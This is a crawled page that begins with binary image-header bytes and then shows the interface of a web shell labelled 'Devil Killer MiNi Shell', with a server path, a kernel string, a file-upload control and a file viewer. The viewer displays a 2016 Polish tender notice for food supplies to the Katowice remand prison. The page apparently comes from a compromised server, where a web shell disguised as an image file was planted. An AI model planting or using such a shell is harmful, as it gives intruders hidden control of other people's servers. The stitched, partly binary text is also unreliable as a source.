JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161206/359438-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zp.sw.gov.pl' target='_blank'>http://www.zp.sw.gov.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 359438 - 2016
              z dnia 2016-12-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Katowice: Dostawa artykułów spożywczych do Aresztu Śledczego w Katowicach<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Areszt Śledczy w Katowicach, krajowy numer identyfikacyjny
              27151806600000, ul.
              ul. Mikołowska 
              ,
              40067  
              Katowice, woj.
              śląskie, państwo
              Polska, tel.
              322 084 567, e-mail
              zp_katowice@sw.gov.pl, faks
              322 512 931.
              <br />
              Adres strony internetowej (URL): www.sw.gov.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Więziennictwo</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zp.sw.gov.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />Areszt Śledczy w Katowicach, 40-067 Katowice, ul. Mikołowska 10a</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa artykułów spożywczych do Aresztu Śledczego w Katowicach<br /><b>Numer referencyjny: </b>D/Kw-220/4/16<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Sukcesywne dostawy różnych artykułów spożywczych do Aresztu Śledczego w Katowicach:
Część 1  Artykuły nabiałowe i tłuszcze jadalne (kod CPV 1550000-8, 15400000-2)
Część 2  Różne artykuły spożywcze (kod CPV 15800000-6)
Część 3  Konserwy rybne (kod CPV 15200000-0)
Część 4  Ryby mrożone, przetwory rybne (kod CPV 15220000-6)
Część 5  Warzywa przetworzone  kiszonki (kod CPV 15330000-0)
Część 6  Jaja spożywcze (kod CPV 03142500-3)
Część 7  Cukier (kod CPV 15831200-4)

Część 1  Artykuły nabiałowe i tłuszcze jadalne:
1. Mleko w proszku granulowane odtłuszczone (opakowanie 5  25 kg), 850 kg.
2. Serek topiony *(opakowanie jednostkowe 0,1 kg), 1550 kg.
3. Serek homogenizowany naturalny (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,1  0,15 kg,) termin przydatności do spożycia min. 10 dni od daty dostawy, 1750 kg.
4. Serek kanapkowy naturalny do smarowania (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,1 - 0,150 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 450 kg.
5. Ser twarogowy chudy (opakowanie 0,2  0,25 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 2750 kg.
6. Serek typu fromage (opakowanie jednostkowe o gramaturze 0,08 -0,1 kg z folii wielowarstwowej lub kształtki z tworzywa sztucznego zamykane zakrywką z folii aluminiowej termozgrzewalnej) termin przydatności do spożycia min. 10 dni od daty dostawy, 950 kg.
7. Ser żółty twardy, pełnotłusty, podpuszczkowy dojrzewający wyrabiany z mleka pasteryzowanego o ustalonej zawartości tłuszczu nie mniej niż 45%, bez dodatku tłuszczu roślinnego*, (opakowanie, kostka lub blok od 1,5 do 5 kg), 900 kg.
8. Serek ziarnisty (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,15 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 400kg g.    
9. Jogurt owocowy (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,12  0,2 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 250 kg. 
10. Jogurt naturalny (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,12  0,2 kg )termin przydatności do spożycia min. 10 dni od daty dostawy, 220 kg. 
11. Śmietana 12% (opakowanie 0,2  1 litr) termin przydatności do spożycia min. 10 dni od daty dostawy, 280 l.
12. Margaryna roślinna do smarowania pieczywa (kostka 0,25 kg), zawartość tłuszczu minimum 40%, 7000 kg.
13. Olej roślinny jadalny (opakowanie jednostkowe od 1 -  5 litrów), 700 l.
* - nie dopuszcza się produktów sero podobnych

Część 2  Różne artykuły spożywcze:
1. Dżem owocowy, opak. jednostkowe 25g, 180kg.
2. Miód pszczeli naturalny  opak. jednostkowe 25g, 100kg.
3. Dżem owocowy, opakowanie  wiaderka do 15kg, 1250kg.
4. Powidła śliwkowe, opakowanie - wiaderka do 15kg, 1250kg.
5. Marmolada wieloowocowa twarda, opakowanie  wiaderka do 15kg, 1250kg
6. Groszek konserwowy kl. I, opak. puszka od 0,4 do 5 kg, 420kg.
7. Papryka konserwowa w zalewie   opak. puszki lub słoje, waga netto po odcieku min. 45%wagi, 400kg.
8. Koncentrat pomidorowy 30% , opak. puszka do 5 kg, 1000kg.
9. Mieszanka warzyw suszonych  minimum 5 składnikowa (m.in. seler, pietruszka, marchew, cebula, por), opak. do 10 kg, 400kg.
10. Fasola biała Jaś, opak. do 50 kg, 1500kg.
11. Groch obłuskany, opak. do 50 kg, 1500kg.
12. Krajanka sojowa, opak. do 20 kg, 280kg.
13. Kotlety sojowe (schabowe), opak do 20 kg, 280kg.
14. Granulat sojowy, opak. do 20 kg, 80kg.
15. Herbata granulowana, opakowania do 10 kg, 170kg.
16. Kawa zbożowa, opakowania do 10 kg, 200kg.
17. Musztarda, opak. jednostkowe 1 kg, 200kg.
18. Majonez, 30kg.
19. Pieprz czarny mielony opakowanie do 1 kg, 75kg.
20. Majeranek w opakowaniach do 1 kg, 20kg.
21. Liść laurowy w opakowaniach do 1 kg, 15kg.
22. Ziele angielskie ziarno w opakowaniach do 1 kg, 15kg.
23. Papryka słodka mielona w opakowaniach do 1 kg, 40kg.
24. Czosnek mielony w opakowaniach do 1 kg, 45kg.
25. Koperek suszony w opakowaniach do 1 kg, 16kg.
26. Przyprawa uniwersalna w proszku typu jarzynka lub równoważna, 87kg.
27. Sól jodowana paczkowana po 1 kg, 1400kg.
28. Przyprawa w płynie typu magi w opakowaniach do 2l., 960l.
29. Ocet spirytusowy 10%,opak. jednostkowe 1l, 180l.
30. Przyprawa do mięs w proszku, 40kg.
31. Przyprawa do bigosu w proszku, 15kg.
32. Kminek przyprawa, 4kg.
33. Syrop wysoko słodzony, 450l.
34. Kwasek cytrynowy, 3kg.
35. Bulion drobiowy, opak. do 20 kg, 550kg.
36. Sos grzybowy w proszku, opak. do 20 kg, 50kg.
37. Sos pieczeniowy w proszku, opak. do 20 kg, 60kg.
38. Sos boloński w proszku, opak. do 20 kg, 70kg.
39. Sos myśliwski w proszku  opak. do 20 kg, 40kg.
40. Zupa w proszku  barszcz biały, opak. do 20 kg, 200kg.
41. Żurek śląski  zakwas w płynie  do 1l, 720l.
42. Paprykarz warzywny opakowanie 120g (alupac), 144kg.

Część 3  Konserwy rybne:
1. Konserwa  sałatka rybna typu Neptun lub równoważna puszka z samootwieraczem 
 waga jednostkowa do 330g, 462kg.
2. Konserwa  paprykarz szczeciński puszka z samootwieraczem  waga jednostkowa do 330g, 561kg.
3. Konserwa  szprot w sosie pomidorowym puszka z samootwieraczem -  waga jednostkowa do 330g, 412,50kg

Część 4  Ryby mrożone, przetwory rybne:
1. Filety śledziowe matias w wiaderkach do 12 kg, 400kg.
2. Ryba mrożona  filet z mintaja mrożony  w technologii shatterpack (SHP): 
ryby układane warstwami, przekładane folią, mrożone w blokach, zawartość glazury: 
3-5% , w opakowaniach kartonowych do 25kg, 260kg. 
3. Kotlet rybny mrożony  produkt garmażeryjny, panierowany, skład ryby min. 40%, 600kg.

Część 5  Warzywa przetworzone kiszonki:
1. Kapusta kiszona opak. beczki zamykane  pojemność do 80 kg, 7500kg.
2. Ogórki kiszone opak. beczki zamykane  pojemność do 80 kg, 4500kg.

Część 6  Jaja spożywcze:
1. Jaja konsumpcyjne  klasa świeżości  A, kategoria wagowa L, 55000szt.

Część 7  Cukier biały:
1. Cukier biały  opakowanie jednostkowe 1 kg, 5500kg
<br /><br /><b>II.5) Główny kod CPV: </b>15500000-8<br /><b> Dodatkowe kody CPV:</b>15400000-2,
                15800000-6,
                15200000-0,
                15220000-6,
                15330000-0,
                15831200-4,
                <br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Działalność zawodowa prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych kompetencji lub uprawnień.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  nie
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) aktualny odpis z właściwego rejestru, lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia pa podstawie art. 24 ust. 5 pkt 1 ustawy Pzp,
b) pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej,
c) pełnomocnictwo  w przypadku podmiotów występujących wspólnie (spółka cywilna,konsorcjum).</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1) aktualny odpis z właściwego rejestru, lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia pa podstawie art. 24 ust. 5 pkt 1 ustawy Pzp,
b) pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej,
c) pełnomocnictwo  w przypadku podmiotów występujących wspólnie (spółka cywilna,konsorcjum).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o przynależności braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców. Wzór oświadczenia stanowi załącznik nr 4 do SIWZ.
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
